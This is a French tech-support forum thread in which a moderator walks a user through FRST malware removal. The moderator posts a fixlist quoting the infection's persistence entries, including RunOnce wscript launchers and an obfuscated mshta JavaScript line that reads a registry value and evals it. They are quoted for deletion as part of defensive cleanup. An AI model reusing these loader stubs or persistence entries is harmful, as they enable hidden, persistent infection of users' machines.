Supprimer programmes malveillants

bonjour depuis un moment Windows defender] detecte toutes les minutes des programmes malveillants ! que faire svp ? MERCI Jack

12 réponses

  1. Merci beaucoup pour ton aide, je vais suivre tes conseils en revenant, je m'absente plusieurs jours ! A bientôt
    0
    1. Modérateur
      ok :)
      0
  2. Modérateur
    Faudrait que tu refasses un scan FRST pour vérifier qu'il n'y a plus rien.
    0
    1. Merci Malekal, le probleme à l'air d'etre resolu ! maintenant pour réparer
      Firefox, Mozilla, je vois que c'est AVG qui à l'air de gérer. Ca ne va pas
      supprimer Windows Defender ? Je dois modifier tous mes mots de passe ?
      Merci
      0
      1. ok Malekal , je pense que j'ai reussi, c'est super long !je continuerai demain, je dois m'absenter, merci à vous, je vous tiens au courant !
        0
        1. Modérateur
          Pas de soucis :)
          Par contre, faudra changer tes mots de passe après désinfection, car il y a des trojans dans le tas.
          0
      2. Modérateur
        Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

        Ouvre le bloc-notes : Touche Windows + R,
        Dans le champs "Exécuter", saisir notepad et OK.
        Copie/Colle dedans ce qui suit :

        CreateRestorePoint:
        CloseProcesses:
        c:\users\adb\appdata\local\chromium
        HKLM-x32\...\Run: [] => [X]
        HKLM-x32\...\RunOnce: [Rafikafehise] => C:\WINDOWS\SysWoW64\wscript.exe /E:vbscript /B C:\Users\ADB\AppData\Roaming\Mipalahuno
        HKLM-x32\...\RunOnce: [Cumori] => C:\WINDOWS\SysWoW64\wscript.exe /E:vbscript /B C:\Users\ADB\AppData\Roaming\Tosefe
        HKU\S-1-5-21-1849708591-4105099571-1882532847-1001\...\Run: [*trxxdjrat<*>] => C:\Users\ADB\AppData\Local\eea9\b40f.lnk <===== ATTENTION (Nom de valeur avec caractères invalides)
        HKU\S-1-5-21-1849708591-4105099571-1882532847-1001\...\Run: [Chromium] => c:\users\adb\appdata\local\chromium\application\chrome.exe [828416 2017-01-21] (The Chromium Authors)
        HKU\S-1-5-21-1849708591-4105099571-1882532847-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)
        2017-05-07 11:59 - 2017-05-07 12:00 - 00000000 ___HD C:\Users\ADB\AppData\Local\2e1fa52e594275ea
        Task: C:\WINDOWS\Tasks\{33E9331C-85A1-686F-8DC4-0CE8861A5D10}.job => C:\PROGRA~2\COMMON~1\Rorol\updane.exe
        Shortcut: C:\Users\ADB\AppData\Local\eea9\b40f.lnk -> C:\Users\ADB\AppData\Local\eea9\afde.bat ()
        C:\Users\ADB\AppData\Local\eea9
        HKU\S-1-5-21-1849708591-4105099571-1882532847-1001\Software\Classes\ec82: "C:\WINDOWS\system32\mshta.exe" "javascript:Qgb9ml="H";A66U=new ActiveXObject("WScript.Shell");Wu4WAqUf="YWzb";EAU6i=A66U.RegRead("HKCU\\software\\twyfxh\\jcsv");RRLi38MC="qHob";eval(EAU6i);grqL5="n4DH5vsx";" <===== ATTENTION
        CHR Extension: (hTab) - C:\Users\ADB\AppData\Local\Google\Chrome\User Data\Default\Extensions\elmkjjfkkchohaaoljobaffjeedcoocj [2017-03-12]
        2017-05-02 18:59 - 2017-03-13 19:19 - 01169344 _____ (VoiceFive, Inc.) C:\WINDOWS\system32\pmls64.dll
        Hosts:
        EmptyTemp:
        RemoveProxy:
        Reboot:


        Une fois, le texte collé dans le Bloc-notes,
        Menu "Fichier" puis "Enregistrer sous",
        A gauche, place toi sur le Bureau,
        Dans le champs en bas, nom du fichier mets : fixlist.txt
        Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

        Relance FRST et clique sur le bouton "Corriger / Fix"
        Un redémarrage sera peut-être nécessaire ( pas obligatoire )
        Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

        Redémarre l'ordinateur.

        2°)
        Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

        3°)
        Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

        4°)
        Vois ce que cela donne et si des améliorations ont eu lieu.
        Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.

        Veuillez appuyer sur une touche pour continuer la désinfection...
        0
        1. Bonjour Malekal

          Je te remercie pour les infos, je vais tout de suite mettre en route
          le processus.
          Merci encore
          0
          1. Modérateur
            Salut,

            Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

            Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
            • FRST.txt
            • Shortcut.txt
            • Additionnal.txt


            Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

            0
            1. personne ne peut m'indiquer svp ?
              0
              1. en plus , les pages rament pas mal !
                0
                1. personne pour aider ?
                  0